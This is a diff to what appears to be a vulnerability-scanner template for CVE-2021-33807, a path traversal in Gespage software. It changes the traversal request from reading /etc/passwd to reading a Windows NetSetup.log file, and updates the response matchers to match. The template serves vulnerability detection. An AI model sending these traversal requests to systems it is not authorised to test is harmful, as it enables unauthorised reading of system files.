diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml
index f021e91be6..a53d190db8 100644
--- a/cves/2021/CVE-2021-33807.yaml
+++ b/cves/2021/CVE-2021-33807.yaml
@@ -13,14 +13,20 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"
 
     matchers-condition: and
     matchers:
 
-      - type: regex
-        regex:
-          - "root:.*:0:0"
+      - type: word
+        words:
+          - "NetpDoDomainJoin:"
+        part: body
+
+      - type: word
+        words:
+          - "application/octet-stream"
+        part: header
 
       - type: status
         status: